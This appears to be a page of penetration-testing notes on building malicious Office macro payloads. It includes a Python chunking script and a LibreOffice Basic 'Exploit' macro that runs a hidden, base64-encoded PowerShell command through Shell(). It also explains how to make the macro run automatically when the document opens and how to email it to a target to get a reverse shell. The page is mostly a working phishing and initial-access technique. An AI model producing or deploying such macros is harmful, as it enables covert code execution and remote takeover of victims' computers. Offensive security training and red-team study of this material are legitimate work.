search

Office Macros

We will show here some methods to create macro payloads for Office documents.

hashtag
LibreOffice

First we need to chunk up our payload as Macros have a limit of 50 characters. We can achieve this with below script:

s = "<payload>"
n = 50
for i in range(0, len(s), n):
    chunk = s[i:i + n]
    print('Str = Str + "' + chunk + '"')

Then we can add the payload as following in LibreOffice Macro documents.

Sub Exploit	
	Dim Str As String
	
	Str = Str + "cmd /c powershell.exe -nop -w hidden -e aQBmACgAWw"
	Str = Str + "BJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0"
	Str = Str + "ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAH"
	[snip]
	...
	[snip]
	Str = Str + "BwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABp"
	Str = Str + "AGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0AC"
	Str = Str + "gAJABzACkAOwA="
	
	Shell(Str)
End Sub

Then we can send an email using sendmail as seen below:

Wes should then receive a reverse shell but we should also try other payload. We will show one other payload below which worked well against windows machines.

To make the macro start when opening the file we need to navigate to Tools -> Customize -> Events. Then we need to assign our macro to the OpenDocument Event.

hashtag
Microsoft Office

We will show below how we can create a macro document which can be used to get inital access.

We use the same python3 script we used above to split our payload into string chunks.

PreviousClient FingerprintingNextWindows Library Files

Last updated